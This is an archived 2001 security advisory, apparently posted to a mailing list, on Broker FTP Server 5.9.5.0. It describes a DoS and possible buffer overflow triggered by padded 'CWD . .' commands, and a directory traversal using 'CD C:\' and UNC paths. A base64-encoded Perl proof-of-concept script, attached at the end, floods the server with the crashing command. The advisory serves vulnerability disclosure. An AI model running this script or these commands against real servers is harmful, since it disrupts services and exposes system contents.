Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Sun, 10 Jun 2001 01:38:04 -0700 (PDT)
From: ByteRage <[email protected]>
To: [email protected]
Subject: Broker FTP Server 5.9.5.0 Buffer Overflow / DoS / Directory Traversal

--0-1957747793-992162284=:85903
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline


Broker FTP Server 5.9.5.0 Buffer Overflow / DoS /
Directory Traversal

TESTED ON

Broker FTP Server 5.9.5.0 on Windows 98, likely to
work on NT / 2k 

DESCRIPTION

1) Buffer Overflow / DoS

The DoS, which completely freezes the victim machine,
can be triggered by repeatedly sending
the following command (after logging in) :

CWD . .
(CD ". ." with an FTP client)

or even better by adding some more spaces between the
dots :
CWD .                                                
.

the server seems to regard these dirs as valid and
appends them to the current path, causing a DoS after
a certain bound has been reached... (I think you have
to repeat the last one about 30 times or so...)

I have attached the script brokerdos.pl which
automates this.

Maybe I'm getting delusional, but I have been able
once to make Broker FTP Server crash this way setting
the EIP to something like "  .\" (and my SoftIce
popped up) so this buffer overflow might be
exploitable... I have not been able to reproduce this
situation afterwards though.

Also, the file at C:\Program Files\TransSoft
Ltd\Broker 5\Data\Errors.log gave me access violations
at offsets that were definitely taken from the input
string. (like 20202020, 2020202E etc...)

2) Directory Traversal

You can map out the contents of every drive available
to the system in the following manner...
(You don't seem to be able to upload / download files
though)

To go out of the home directory type the following in
your FTP client :

CD C: or CD C:\

(you can also go to the A: drive with CD A: (or
CD-roms & network drives))
Now you can list out the contents of the drive with
the FTP client :

LS 

And dive into subdirs with something like :

CD C:\WINDOWS\

etc...
Although you can map every drive, you don't seem to be
able to send/recieve files. It is also possible to
traverse the homedirectory using UNC pathnames
(starting with \\) which might be used to remotely
access local shares.

VENDOR STATUS

I have sent this advisory to <[email protected]>

You can get the updated advisory at
http://elf.box.sk/byterage/adv7.htm


[ByteRage] <[email protected]> [www.byterage.cjb.net]


__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail - only $35 
a year!  http://personal.mail.yahoo.com/
--0-1957747793-992162284=:85903
Content-Type: application/x-perl; name="brokerdos.pl"
Content-Transfer-Encoding: base64
Content-Description: brokerdos.pl
Content-Disposition: attachment; filename="brokerdos.pl"

IyEvdXNyL2Jpbi9wZXJsIA0KDQojIEJyb2tlciBGVFAgU2VydmVyIDUuOS41
LjAgRG9TIHByb29mIG9mIGNvbmNlcHQNCiMNCiMgU3ludGF4IDogcGVybCBi
cm9rZXJkb3MucGwgPGhvc3Q+IDxwb3J0PiA8bG9naW5pZD4gPGxvZ2lucHdk
Pg0KIyBJbXBhY3QgOiBldmVudHVhbGx5IGNhdXNlcyBhbiBhY2Nlc3Mgdmlv
bGF0aW9uIGluIHRoZSBUU0ZUUFNSViBwcm9jZXNzDQojICAgICAgICAgIHRo
ZSBidWZmZXIgb3ZlcmZsb3cgbWlnaHQgYmUgZXhwbG9pdGFibGUgYW5kIGJl
IHVzZWQgdG8gZ2FpbiBhY2Nlc3MNCiMgICAgICAgICAgdG8gdGhlIEZUUCBT
ZXJ2ZXIgaG9zdGNvbXB1dGVyLg0KIw0KIyBieSBbQnl0ZVJhZ2VdIDxieXRl
cmFnZUB5YWhvby5jb20+DQojIHd3dy5ieXRlcmFnZS5jamIubmV0IChodHRw
Oi8vZWxmLmJveC5zay9ieXRlcmFnZS8pDQoNCnVzZSBJTzo6U29ja2V0Ow0K
DQokbG9naW5pZCA9ICJhbm9ueW1vdXMiOw0KJGxvZ2lucHdkID0gImFub255
bW91cyI7DQoNCmlmICghKCRob3N0ID0gJEFSR1ZbMF0pKSB7ICRob3N0ID0g
IjEyNy4wLjAuMSI7IH0gcHJpbnQgIkxvZ2dpbmcgb24gQCAkaG9zdDoiOyAN
CmlmICghKCRwb3J0ID0gJEFSR1ZbMV0pKSB7ICRwb3J0ID0gIjIxIjsgfSBw
cmludCAiJHBvcnRcblxuIjsgDQppZiAoISgkbG9naW5pZCA9ICRBUkdWWzJd
KSkgeyAkbG9naW5pZCA9ICJhbm9ueW1vdXMiOyB9IA0KaWYgKCEoJGxvZ2lu
cHdkID0gJEFSR1ZbM10pKSB7ICRsb2dpbnB3ZCA9ICJhbm9ueW1vdXMiOyB9
IA0KDQokU09DSyA9IElPOjpTb2NrZXQ6OklORVQtPm5ldyhQcm90bz0+InRj
cCIsIFBlZXJBZGRyPT4kaG9zdCwgUGVlclBvcnQ9PiRwb3J0KSB8fCBkaWUg
IkNvdWxkbid0IGNyZWF0ZSBzb2NrZXQgISI7ICRTT0NLLT5hdXRvZmx1c2go
KTsNCg0KIyBnZXQgZGFlbW9uIGJhbm5lcg0KJHJlcGx5ID0gIiI7DQpzeXNy
ZWFkKCRTT0NLLCAkcmVwbHksIDIwMDApOw0KcHJpbnQgJHJlcGx5Ow0KIyBs
b2dpbg0Kc3lzd3JpdGUgJFNPQ0ssICJVU0VSICRsb2dpbmlkXDAxNVwwMTIi
Ow0Kc3lzcmVhZCgkU09DSywgJHJlcGx5LCAyMDAwKTsNCnByaW50ICRyZXBs
eTsNCnN5c3dyaXRlICRTT0NLLCAiUEFTUyAkbG9naW5wd2RcMDE1XDAxMiI7
DQpzeXNyZWFkKCRTT0NLLCAkcmVwbHksIDIwMDApOw0KcHJpbnQgJHJlcGx5
Ow0Kc3lzcmVhZCgkU09DSywgJHJlcGx5LCAyMDAwKTsNCnByaW50ICIkcmVw
bHlcblNlbmRpbmcgY3Jhc2ggWyI7DQoNCmlmIChzdWJzdHIoJHJlcGx5LDAs
MSkgPT0gJzInKSB7DQogICMgTG9naW4gc3VjY2VzZnVsLCBzZW5kIENXRCdz
DQogICRpID0gMTsgd2hpbGUgKCRpKSB7DQogICAgJGkgPSBzeXN3cml0ZSAk
U09DSywgIkNXRCAuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAu
XDAxNVwwMTIiOw0KICAgIHByaW50ICIuIjsNCiAgICBzbGVlcCgxKTsNCiAg
fQ0KcHJpbnQgIl1cblNvY2tldCB3cml0ZSBmYWlsZWQuLi4gcG9zc2libGUg
Y2F1c2UgOiBIb3N0IGRvd24gOihcbiI7DQp9DQpjbG9zZSgkU09DSyk7DQpl
eGl0KCk7

--0-1957747793-992162284=:85903--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: